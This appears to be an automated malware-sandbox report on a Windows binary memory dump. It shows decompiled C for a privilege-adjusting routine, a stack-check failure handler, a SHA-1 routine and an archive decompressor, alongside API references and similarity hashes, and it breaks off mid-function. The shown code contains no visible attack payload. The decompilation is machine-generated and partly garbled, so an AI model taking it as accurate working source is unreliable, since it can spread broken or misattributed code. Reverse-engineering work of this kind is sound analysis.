0x00403442
0x00403346
0x00403348
0x00000000
0x00000000
0x00000000
0x00403348
0x00403342
0x00403183
0x00403186
0x004031c7
0x004031ce
0x004031ce
0x004031d3
0x004031d8
0x004031da
0x004031f9
0x00403204
0x00403207
0x0040320d
0x00403210
0x00000000
0x00000000
0x0040321e
0x00403223
0x0040322a
0x0040322e
0x00403238
0x00403246
0x0040324f
0x0040325b
0x00403268
0x00403277
0x00403281
0x00403283
0x00403283
0x00403285
0x00403285
0x0040328b
0x00000000
0x0040328b
0x004031dc
0x004031e2
0x00000000
0x004031e2
0x00403188
0x0040318b
0x00403192
0x00403199
0x00403199
0x004031a5
0x004031ab
0x004031b2
0x004031b9
0x004031b9
0x00000000
0x0040318b
0x004030f8
0x004030fb
0x00403101
0x00403104
0x00403106
0x00000000
0x00000000
0x00403108
0x0040310f
0x00403111
0x00000000
0x00403111
0x0040310a
0x0040310d
0x00000000
0x00000000
0x00000000
0x0040310d
0x004030a7
0x004030b3
0x004030ba
0x004030bf
0x004030c3
0x00000000
0x004030c5
0x004030cc
0x004030d1
0x00000000
0x004030d1
0x00403046
0x00403048
0x00000000
0x00403048
0x00403044
0x00402f06
0x00402f0e
0x00402f11
0x00402f13
0x00402f15
0x00000000
0x00402f23
0x00402f25
0x00402f29
0x00402f38
0x00402f3b
0x00402f3e
0x00402f79
0x00402f82
0x00402f87
0x00402f8e
0x00402fcc
0x00402fcc
0x00000000
0x00402fcc
0x00402f9d
0x00402fa2
0x00402fa5
0x00402fa7
0x00000000
0x00402fa9
0x00402faf
0x00402fbb
0x00402fc2
0x00000000
0x00402fc2
0x00402fa7
0x00000000
0x00402f3e

APIs

__EH_prolog.LIBCMT ref: 00402ED5
_memcmp.LIBCMT ref: 00402F9D
_memcmp.LIBCMT ref: 00403277

Strings

CMT, xrefs: 004034FA
l*C, xrefs: 00402FB6
@, xrefs: 00403444
l*C, xrefs: 004030AE

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _memcmp$H_prolog
String ID: @$CMT$l*C$l*C
API String ID: 212800410-3304279281
Opcode ID: 374a68b6d4ca5a9c849d917412be3aec37f592652705bc829853cb849f1f976b
Instruction ID: 4c7304372bc57051d3267d017fa97caa5cd7aeb58b38d2d2da642ebd65b0a499
Opcode Fuzzy Hash: 374a68b6d4ca5a9c849d917412be3aec37f592652705bc829853cb849f1f976b
Instruction Fuzzy Hash: 4122E3315046449ADF15DF24C885BDA3BE4EF55308F08047FED4AAF2C2DB79AA88CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040647C, Relevance: 9.0, APIs: 6, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040647C(WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				long _t19;

				_t19 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v8) != 0) {
					_v24.PrivilegeCount = 1;
					_v12 = 2;
					if(LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)) != 0 && AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0) != 0 && GetLastError() == 0) {
						_t19 = 1;
					}
					CloseHandle(_v8);
				}
				return _t19;
			}

0x00406489
0x0040649a
0x004064a3
0x004064ab
0x004064ba
0x004064db
0x004064db
0x004064e0
0x004064e0
0x004064ea

APIs

GetCurrentProcess.KERNEL32(00000020,?), ref: 0040648B
OpenProcessToken.ADVAPI32(00000000), ref: 00406492
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004064B2
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 004064C7
GetLastError.KERNEL32 ref: 004064D1
CloseHandle.KERNEL32(?), ref: 004064E0

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3398352648-0
Opcode ID: 59c91506bf58192db4d8df2f1eb978e606e7207330f03ec03be3edc3f4cdaaec
Instruction ID: 205a993b91cdfa458c166e990dd16a59f2dc8ad9fef5e72dc656366ad97beaba
Opcode Fuzzy Hash: 59c91506bf58192db4d8df2f1eb978e606e7207330f03ec03be3edc3f4cdaaec
Instruction Fuzzy Hash: D401FBB1A00209BFDB209FA49D89EAB7A6CAB04344F400076A902E2251DB35CA259A79

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0DE, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041E0DE(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x42f298; // 0x22b770b9
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x44f420 = _t6;
				 *0x44f41c = _t22;
				 *0x44f418 = _t25;
				 *0x44f414 = _t21;
				 *0x44f410 = _t27;
				 *0x44f40c = _t26;
				 *0x44f438 = ss;
				 *0x44f42c = cs;
				 *0x44f408 = ds;
				 *0x44f404 = es;
				 *0x44f400 = fs;
				 *0x44f3fc = gs;
				asm("pushfd");
				_pop( *0x44f430);
				 *0x44f424 =  *_t31;
				 *0x44f428 = _v0;
				 *0x44f434 =  &_a4;
				 *0x44f370 = 0x10001;
				_t11 =  *0x44f428; // 0x0
				 *0x44f324 = _t11;
				 *0x44f318 = 0xc0000409;
				 *0x44f31c = 1;
				_t12 =  *0x42f298; // 0x22b770b9
				_v812 = _t12;
				_t13 =  *0x42f29c; // 0xdd488f46
				_v808 = _t13;
				 *0x44f368 = IsDebuggerPresent();
				_push(1);
				E004248F9(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x42b9d8);
				if( *0x44f368 == 0) {
					_push(1);
					E004248F9(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0041e0de
0x0041e0de
0x0041e0de
0x0041e0de
0x0041e0de
0x0041e0de
0x0041e0de
0x0041e0e4
0x0041e0e6
0x0041e0e6
0x00423966
0x0042396b
0x00423971
0x00423977
0x0042397d
0x00423983
0x00423989
0x00423990
0x00423997
0x0042399e
0x004239a5
0x004239ac
0x004239b3
0x004239b4
0x004239bd
0x004239c5
0x004239cd
0x004239d8
0x004239e2
0x004239e7
0x004239ec
0x004239f6
0x00423a00
0x00423a05
0x00423a0b
0x00423a10
0x00423a1c
0x00423a21
0x00423a23
0x00423a2b
0x00423a36
0x00423a43
0x00423a45
0x00423a47
0x00423a4c
0x00423a60

APIs

IsDebuggerPresent.KERNEL32 ref: 00423A16
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423A2B
UnhandledExceptionFilter.KERNEL32(0042B9D8), ref: 00423A36
GetCurrentProcess.KERNEL32(C0000409), ref: 00423A52
TerminateProcess.KERNEL32(00000000), ref: 00423A59

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 66d9c3a5dab2fb38b5a1401810a95f8d4dad4de9b5e07c02ef9de68d018fcd94
Instruction ID: f9a4d5aaf76eb4d91c51b3db4297d60a051865622f36d18d50bd3b2191de3dc8
Opcode Fuzzy Hash: 66d9c3a5dab2fb38b5a1401810a95f8d4dad4de9b5e07c02ef9de68d018fcd94
Instruction Fuzzy Hash: D021E2BC601210DFD710DF59F9886467BA4FB2A325F90407AE90883262DBB4558ACF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD6B, Relevance: 4.0, Strings: 3, Instructions: 289
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E0040FD6B(void* __ecx, void* _a4, signed int _a8, signed int* _a12, signed int _a16) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				signed int* _v16;
				void _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t236;
				signed int _t244;
				signed int _t255;
				signed int _t264;
				signed int _t274;
				void* _t276;
				signed int _t286;
				signed int _t288;
				signed int _t292;
				signed int _t298;
				signed int* _t312;
				void* _t332;
				intOrPtr _t333;
				signed int _t337;
				signed int* _t340;
				signed int* _t341;
				signed int* _t345;
				signed int _t346;
				signed int* _t350;
				void* _t351;
				void* _t356;
				signed int _t389;
				void* _t390;
				signed int* _t392;
				signed int* _t400;
				signed int* _t408;
				signed int* _t412;
				signed int* _t415;
				signed int* _t420;
				void* _t421;
				void* _t422;

				if(_a16 == 0) {
					_t286 = _a12;
				} else {
					_t286 = _a8;
					E0041BB80(_t286, _t356, _t390, _t286, _a12, 0x40);
					_t422 = _t422 + 0xc;
				}
				if( *0x44ea30 == 0) {
					_t333 = 0;
					_t420 = 0x44e3f4;
					do {
						_t5 = _t333 + 1; // 0x1
						asm("cdq");
						_t389 = 5;
						_t10 = _t333 + 2; // 0x2
						 *((intOrPtr*)(_t420 - 4)) = _t333;
						 *_t420 = _t5 % _t389;
						asm("cdq");
						_t16 = _t333 + 3; // 0x3
						_t420 =  &(_t420[5]);
						 *(_t420 - 0x10) = _t10 % _t389;
						asm("cdq");
						_t22 = _t333 + 4; // 0x4
						 *(_t420 - 0xc) = _t16 % _t389;
						asm("cdq");
						 *(_t420 - 8) = _t22 % _t389;
						if(_t333 == 0) {
							_t333 = 4;
						} else {
							_t333 = _t333 - 1;
						}
					} while (_t420 < 0x44ea34);
					 *0x44ea30 = 1;
				}
				_t288 = 5;
				memcpy( &_v36, _a4, _t288 << 2);
				_t236 = 0x44e3fc;
				_a16 = _t286;
				do {
					_t392 = _a16;
					asm("ror ecx, 0x8");
					asm("rol edx, 0x8");
					_t292 =  *_t392 & 0xff00ff00 |  *_t392 & 0x00ff00ff;
					 *_t392 = _t292;
					_t34 = _t236 - 8; // 0x0
					_t337 =  *(_t421 +  *_t236 * 4 - 0x20);
					_t38 = _t236 - 4; // 0x0
					_a16 = _a16 + 4;
					_a12 = _t421 +  *_t34 * 4 - 0x20;
					_t48 =  &(_t236[1]); // 0x0
					_v8 = _t421 +  *_t48 * 4 - 0x20;
					_t53 = _t236 - 0xc; // 0x0
					_a8 = _t337;
					asm("rol esi, 0x5");
					_t62 =  *((intOrPtr*)(_t421 +  *_t53 * 4 - 0x20)) + _t292 + 0x5a827999; // 0x5a827a75
					 *_v8 =  *_v8 + (( *(_t421 +  *_t38 * 4 - 0x20) ^ _t337) &  *_a12 ^ _a8) + _t62;
					asm("ror dword [ecx], 0x2");
					_t236 =  &(_t236[5]);
					_t340 = 0x44e53c;
				} while (_t236 < 0x44e53c);
				_a16 = 0x10;
				do {
					_t66 = _a16 - 3; // 0xd
					_t295 = _t66;
					_t400 = _t286 + (_a16 & 0x0000000f) * 4;
					_t69 = _t295 - 5; // 0x8
					_t72 = _t295 + 5; // 0x12
					_t244 =  *(_t286 + (_t69 & 0x0000000f) * 4) ^  *(_t286 + (_t72 & 0x0000000f) * 4) ^  *(_t286 + (_t66 & 0x0000000f) * 4) ^  *_t400;
					asm("rol eax, 1");
					 *_t400 = _t244;
					_t77 = _t340 - 8; // 0x0
					_t298 =  *(_t421 +  *_t340 * 4 - 0x20);
					_t81 = _t340 - 4; // 0x0
					_a12 = _t421 +  *_t77 * 4 - 0x20;
					_t89 =  &(_t340[1]); // 0x0
					_v8 = _t421 +  *_t89 * 4 - 0x20;
					_t94 = _t340 - 0xc; // 0x0
					_a8 = _t298;
					asm("rol esi, 0x5");
					_t103 =  *((intOrPtr*)(_t421 +  *_t94 * 4 - 0x20)) + _t244 + 0x5a827999; // 0x5a827a75
					 *_v8 =  *_v8 + (( *(_t421 +  *_t81 * 4 - 0x20) ^ _t298) &  *_a12 ^ _a8) + _t103;
					asm("ror dword [eax], 0x2");
					_a16 = _a16 + 1;
					_t340 =  &(_t340[5]);
				} while (_t340 < 0x44e58c);
				_a16 = 0x14;
				_t341 = 0x44e58c;
				do {
					_t109 = _a16 - 3; // 0x11
					_t301 = _t109;
					_t408 = _t286 + (_a16 & 0x0000000f) * 4;
					_t112 = _t301 - 5; // 0xc
					_t113 = _t301 + 5; // 0x16
					_t255 =  *(_t286 + (_t112 & 0x0000000f) * 4) ^  *(_t286 + (_t113 & 0x0000000f) * 4) ^  *(_t286 + (_t109 & 0x0000000f) * 4) ^  *_t408;
					asm("rol eax, 1");
					 *_t408 = _t255;
					_t120 = _t341 - 8; // 0x0
					_a12 = _t421 +  *_t120 * 4 - 0x20;
					_t125 =  &(_t341[1]); // 0x0
					_v8 = _t421 +  *_t125 * 4 - 0x20;
					_t130 = _t341 - 0xc; // 0x0
					_t134 = _t341 - 4; // 0x0
					asm("rol esi, 0x5");
					 *_v8 =  *_v8 + ( *(_t421 +  *_t134 * 4 - 0x20) ^  *(_t421 +  *_t341 * 4 - 0x20) ^  *_a12) +  *((intOrPtr*)(_t421 +  *_t130 * 4 - 0x20)) + _t255 + 0x6ed9eba1;
					asm("ror dword [ecx], 0x2");
					_a16 = _a16 + 1;
					_t341 =  &(_t341[5]);
				} while (_t341 < 0x44e71c);
				_t312 = 0x44e718;
				_a16 = 0x28;
				_a12 = 0x44e718;
				do {
					_t150 = _a16 - 3; // 0x25
					_t342 = _t150;
					_t412 = _t286 + (_a16 & 0x0000000f) * 4;
					_t153 = _t342 - 5; // 0x20
					_t156 = _t342 + 5; // 0x2a
					_t264 =  *(_t286 + (_t153 & 0x0000000f) * 4) ^  *(_t286 + (_t156 & 0x0000000f) * 4) ^  *(_t286 + (_t150 & 0x0000000f) * 4) ^  *_t412;
					asm("rol eax, 1");
					 *_t412 = _t264;
					_t161 = _t312 - 4; // 0x0
					_t162 =  &(_t312[2]); // 0x0
					_t345 = _t421 +  *_t161 * 4 - 0x20;
					_v16 = _t345;
					_t346 =  *_t345;
					_v12 = _t421 +  *_t162 * 4 - 0x20;
					_t174 = _t312 - 8; // 0x0
					_t175 =  &(_t312[1]); // 0x0
					_a8 = _t346;
					asm("rol edi, 0x5");
					 *_v12 =  *_v12 + ( *(_t421 +  *_t175 * 4 - 0x20) & (_t346 |  *(_t421 +  *_t312 * 4 - 0x20)) | _a8 &  *(_t421 +  *_t312 * 4 - 0x20)) +  *((intOrPtr*)(_t421 +  *_t174 * 4 - 0x20)) + _t264 - 0x70e44324;
					asm("ror dword [eax], 0x2");
					_a16 = _a16 + 1;
					_t312 =  &(_a12[5]);
					_a12 = _t312;
				} while (_t312 < 0x44e8a8);
				_a16 = 0x3c;
				_t350 = 0x44e8ac;
				do {
					_t194 = _a16 - 3; // 0x39
					_t320 = _t194;
					_t415 = _t286 + (_a16 & 0x0000000f) * 4;
					_t197 = _t320 - 5; // 0x34
					_t198 = _t320 + 5; // 0x3e
					_t274 =  *(_t286 + (_t197 & 0x0000000f) * 4) ^  *(_t286 + (_t198 & 0x0000000f) * 4) ^  *(_t286 + (_t194 & 0x0000000f) * 4) ^  *_t415;
					asm("rol eax, 1");
					 *_t415 = _t274;
					_t205 = _t350 - 8; // 0x0
					_a12 = _t421 +  *_t205 * 4 - 0x20;
					_t210 =  &(_t350[1]); // 0x0
					_v16 = _t421 +  *_t210 * 4 - 0x20;
					_t215 = _t350 - 0xc; // 0x0
					_t219 = _t350 - 4; // 0x0
					asm("rol esi, 0x5");
					 *_v16 =  *_v16 + ( *(_t421 +  *_t219 * 4 - 0x20) ^  *(_t421 +  *_t350 * 4 - 0x20) ^  *_a12) +  *((intOrPtr*)(_t421 +  *_t215 * 4 - 0x20)) + _t274 - 0x359d3e2a;
					asm("ror dword [ecx], 0x2");
					_a16 = _a16 + 1;
					_t350 =  &(_t350[5]);
				} while (_t350 < 0x44ea3c);
				_t276 = _a4;
				_t332 =  &_v36 - _t276;
				_t351 = 5;
				do {
					 *_t276 =  *_t276 +  *((intOrPtr*)(_t332 + _t276));
					_t276 = _t276 + 4;
					_t351 = _t351 - 1;
				} while (_t351 != 0);
				return _t276;
			}

0x0040fd78
0x0040fd8d
0x0040fd7a
0x0040fd7a
0x0040fd83
0x0040fd88
0x0040fd88
0x0040fd97
0x0040fd99
0x0040fd9b
0x0040fda0
0x0040fda0
0x0040fda3
0x0040fda6
0x0040fda9
0x0040fdac
0x0040fdaf
0x0040fdb1
0x0040fdb4
0x0040fdb7
0x0040fdba
0x0040fdbd
0x0040fdc0
0x0040fdc3
0x0040fdc6
0x0040fdc9
0x0040fdce
0x0040fdd5
0x0040fdd0
0x0040fdd0
0x0040fdd0
0x0040fdd6
0x0040fdde
0x0040fdde
0x0040fdea
0x0040fdee
0x0040fdf0
0x0040fdf5
0x0040fdf8
0x0040fdf8
0x0040fdff
0x0040fe08
0x0040fe11
0x0040fe13
0x0040fe15
0x0040fe1a
0x0040fe1e
0x0040fe25
0x0040fe2d
0x0040fe30
0x0040fe39
0x0040fe3c
0x0040fe43
0x0040fe4b
0x0040fe56
0x0040fe5d
0x0040fe62
0x0040fe65
0x0040fe68
0x0040fe6d
0x0040fe71
0x0040fe78
0x0040fe7b
0x0040fe7b
0x0040fe81
0x0040fe84
0x0040fe8d
0x0040fe9c
0x0040fe9e
0x0040fea0
0x0040fea2
0x0040fea7
0x0040feab
0x0040feb6
0x0040feb9
0x0040fec2
0x0040fec5
0x0040fecc
0x0040fed4
0x0040fedf
0x0040fee6
0x0040feeb
0x0040feee
0x0040fef1
0x0040fef9
0x0040ff01
0x0040ff08
0x0040ff0a
0x0040ff0d
0x0040ff0d
0x0040ff13
0x0040ff16
0x0040ff19
0x0040ff2e
0x0040ff30
0x0040ff32
0x0040ff34
0x0040ff3d
0x0040ff40
0x0040ff47
0x0040ff4a
0x0040ff51
0x0040ff5c
0x0040ff72
0x0040ff74
0x0040ff77
0x0040ff7a
0x0040ff7d
0x0040ff85
0x0040ff8a
0x0040ff91
0x0040ff94
0x0040ff97
0x0040ff97
0x0040ff9d
0x0040ffa0
0x0040ffa9
0x0040ffb8
0x0040ffba
0x0040ffbc
0x0040ffbe
0x0040ffc1
0x0040ffca
0x0040ffd2
0x0040ffd5
0x0040ffd7
0x0040ffda
0x0040ffdd
0x0040ffe8
0x0040fff8
0x00410007
0x0041000f
0x00410012
0x00410015
0x0041001e
0x0041001e
0x00410027
0x0041002e
0x00410033
0x00410036
0x00410036
0x0041003c
0x0041003f
0x00410042
0x00410057
0x00410059
0x0041005b
0x0041005d
0x00410066
0x00410069
0x00410070
0x00410073
0x0041007a
0x00410085
0x0041009b
0x0041009d
0x004100a0
0x004100a3
0x004100a6
0x004100ae
0x004100b6
0x004100b8
0x004100b9
0x004100bc
0x004100be
0x004100c1
0x004100c1
0x004100c8

Strings

<D, xrefs: 0040FE68
<D, xrefs: 004100A6
4D, xrefs: 0040FDD6

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 4D$<D$<D
API String ID: 0-1366070547
Opcode ID: aca921e275d15fd4aa94188d48948d55437fa6c05b647084dc68501852b2f31b
Instruction ID: 6dcb79aaa52ee8c05fd16db8479ceda058c6511e5e5aebdafbe02d5621703e8b
Opcode Fuzzy Hash: aca921e275d15fd4aa94188d48948d55437fa6c05b647084dc68501852b2f31b
Instruction Fuzzy Hash: 00D13C72A0021ACFCF14CF58D884599B7B1FF8C318B2685ADED19AB245D731BA16CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00414487, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 478
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00414487(void* __ebx, intOrPtr __ecx, signed int _a4) {
				signed char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				signed int* _v28;
				intOrPtr _v32;
				signed char _v36;
				signed int _v40;
				signed int _v44;
				signed char _v48;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				signed int _t219;
				unsigned int _t220;
				signed int _t223;
				signed int _t224;
				signed int _t226;
				unsigned int _t227;
				signed int _t230;
				signed int _t231;
				signed int _t236;
				unsigned int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int* _t249;
				signed int _t250;
				signed int _t257;
				unsigned int _t258;
				signed int _t261;
				signed int _t262;
				signed int* _t267;
				unsigned int _t268;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				unsigned int _t274;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				unsigned int _t280;
				signed int _t287;
				unsigned int _t288;
				signed int _t291;
				signed int _t292;
				signed int _t294;
				signed int _t295;
				signed int _t297;
				void* _t302;
				void* _t303;
				signed int* _t306;
				signed int* _t307;
				signed int _t311;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				intOrPtr* _t319;
				signed int _t320;
				signed int _t321;
				intOrPtr _t327;
				signed int* _t328;
				signed int _t331;
				void* _t333;
				signed int _t338;
				void* _t340;
				signed char _t344;
				void* _t347;
				intOrPtr* _t351;
				void* _t352;
				signed int _t355;
				signed int _t358;
				signed int _t363;
				unsigned int _t365;
				void* _t367;
				signed char _t370;
				void* _t373;
				signed int _t378;
				unsigned int _t380;
				void* _t382;
				void* _t384;
				signed int _t387;
				void* _t390;
				void* _t392;
				signed int _t395;
				void* _t398;
				signed int _t402;
				signed short _t403;
				intOrPtr* _t405;
				void* _t406;
				signed int _t409;
				signed int _t415;
				signed int _t416;
				signed int _t420;
				signed int _t421;
				signed int _t427;
				signed int _t429;
				signed int _t432;
				signed int _t433;
				intOrPtr* _t436;
				signed int _t441;
				intOrPtr* _t443;

				_t303 = __ebx;
				_t441 = _a4;
				_v32 = __ecx;
				if( *((char*)(_t441 + 0x2c)) != 0) {
					L3:
					_t214 =  *((intOrPtr*)(_t441 + 0x18));
					_t443 = _t441 + 4;
					__eflags =  *_t443 -  *((intOrPtr*)(_t441 + 0x24)) + _t214;
					if( *_t443 <=  *((intOrPtr*)(_t441 + 0x24)) + _t214) {
						 *(_t441 + 0x4ad8) =  *(_t441 + 0x4ad8) & 0x00000000;
						_t215 =  *((intOrPtr*)(_t441 + 0x20)) + _t214 - 1;
						_t327 =  *((intOrPtr*)(_t441 + 0x4acc)) - 0x10;
						__eflags = _t215 - _t327;
						_v16 = _t215;
						_v20 = _t327;
						_v12 = _t215;
						if(_t215 >= _t327) {
							_v12 = _t327;
						}
						_push(_t303);
						while(1) {
							_t214 =  *_t443;
							__eflags = _t214 - _v12;
							if(_t214 < _v12) {
								goto L15;
							}
							L9:
							__eflags = _t214 - _v16;
							if(__eflags > 0) {
								L97:
								goto L98;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t214 - _v20;
								if(_t214 < _v20) {
									L14:
									__eflags = _t214 -  *((intOrPtr*)(_t441 + 0x4acc));
									if(_t214 >=  *((intOrPtr*)(_t441 + 0x4acc))) {
										L96:
										 *((char*)(_t441 + 0x4ad3)) = 1;
										goto L97;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t441 + 0x4ad2));
								if( *((char*)(_t441 + 0x4ad2)) == 0) {
									goto L96;
								}
								goto L14;
							}
							__eflags =  *((intOrPtr*)(_t441 + 8)) -  *((intOrPtr*)(_t441 + 0x1c));
							if( *((intOrPtr*)(_t441 + 8)) >=  *((intOrPtr*)(_t441 + 0x1c))) {
								goto L97;
							}
							goto L12;
							L15:
							_t328 = _t441 + 0x4adc;
							_t216 =  *_t328;
							__eflags =  *(_t441 + 0x4ad8) - _t216 - 8;
							if(__eflags > 0) {
								_t295 = _t216 + _t216;
								 *_t328 = _t295;
								_push(_t295 * 0xc);
								_t307 = _t441 + 0x4ad4;
								_push( *_t307);
								_t297 = E00419E8C(_t307, _t441, _t443, __eflags);
								 *_t307 = _t297;
								__eflags = _t297;
								if(_t297 == 0) {
									E004062F7(0x432a6c);
								}
							}
							_t217 =  *(_t441 + 0x4ad8);
							_t306 = _t217 * 0xc +  *(_t441 + 0x4ad4);
							_v28 = _t306;
							 *(_t441 + 0x4ad8) = _t217 + 1;
							_t219 = E004094F9(_t443);
							_t415 =  *(_t441 + 0xb4);
							_t220 = _t219 & 0x0000fffe;
							__eflags = _t220 -  *((intOrPtr*)(_t441 + 0x34 + _t415 * 4));
							if(_t220 >=  *((intOrPtr*)(_t441 + 0x34 + _t415 * 4))) {
								_t416 = _t415 + 1;
								_a4 = 0xf;
								__eflags = _t416 - 0xf;
								if(_t416 >= 0xf) {
									L26:
									_t331 =  *(_t443 + 4) + _a4;
									 *_t443 =  *_t443 + (_t331 >> 3);
									_t419 = _a4;
									 *(_t443 + 4) = _t331 & 0x00000007;
									_t333 = 0x10;
									_t223 = (_t220 -  *((intOrPtr*)(_t441 + 0x30 + _a4 * 4)) >> _t333 - _a4) +  *((intOrPtr*)(_t441 + 0x74 + _t419 * 4));
									__eflags = _t223 -  *((intOrPtr*)(_t441 + 0x30));
									if(_t223 >=  *((intOrPtr*)(_t441 + 0x30))) {
										_t223 = 0;
										__eflags = 0;
									}
									_t224 =  *(_t441 + 0xcb8 + _t223 * 2) & 0x0000ffff;
									goto L29;
								}
								_t405 = _t441 + 0x34 + _t416 * 4;
								while(1) {
									__eflags = _t220 -  *_t405;
									if(_t220 <  *_t405) {
										break;
									}
									_t416 = _t416 + 1;
									_t405 = _t405 + 4;
									__eflags = _t416 - 0xf;
									if(_t416 < 0xf) {
										continue;
									}
									goto L26;
								}
								_a4 = _t416;
								goto L26;
							} else {
								_t406 = 0x10;
								_t294 = _t220 >> _t406 - _t415;
								_t409 = ( *(_t294 + _t441 + 0xb8) & 0x000000ff) +  *(_t443 + 4);
								 *_t443 =  *_t443 + (_t409 >> 3);
								 *(_t443 + 4) = _t409 & 0x00000007;
								_t224 =  *(_t441 + 0x4b8 + _t294 * 2) & 0x0000ffff;
								L29:
								__eflags = _t224 - 0x100;
								if(_t224 >= 0x100) {
									__eflags = _t224 - 0x106;
									if(_t224 < 0x106) {
										__eflags = _t224 - 0x100;
										if(_t224 != 0x100) {
											__eflags = _t224 - 0x101;
											if(_t224 != 0x101) {
												 *_t306 = 3;
												_t306[2] = _t224 + 0xfffffefe;
												_t226 = E004094F9(_t443);
												_t420 =  *(_t441 + 0x2d78);
												_t227 = _t226 & 0x0000fffe;
												__eflags = _t227 -  *((intOrPtr*)(_t441 + 0x2cf8 + _t420 * 4));
												if(_t227 >=  *((intOrPtr*)(_t441 + 0x2cf8 + _t420 * 4))) {
													_t421 = _t420 + 1;
													_a4 = 0xf;
													__eflags = _t421 - 0xf;
													if(_t421 >= 0xf) {
														L88:
														_t338 =  *(_t443 + 4) + _a4;
														 *_t443 =  *_t443 + (_t338 >> 3);
														_t424 = _a4;
														 *(_t443 + 4) = _t338 & 0x00000007;
														_t340 = 0x10;
														_t230 = (_t227 -  *((intOrPtr*)(_t441 + 0x2cf4 + _a4 * 4)) >> _t340 - _a4) +  *((intOrPtr*)(_t441 + 0x2d38 + _t424 * 4));
														__eflags = _t230 -  *((intOrPtr*)(_t441 + 0x2cf4));
														if(_t230 >=  *((intOrPtr*)(_t441 + 0x2cf4))) {
															_t230 = 0;
															__eflags = 0;
														}
														_t231 =  *(_t441 + 0x397c + _t230 * 2) & 0x0000ffff;
														L91:
														__eflags = _t231 - 8;
														if(_t231 >= 8) {
															_t344 = (_t231 >> 2) - 1;
															_v8 = _t344;
															_t236 = ((_t231 & 0x00000003 | 0x00000004) << _t344) + 2;
															_a4 = _t236;
															__eflags = _t344;
															if(_t344 > 0) {
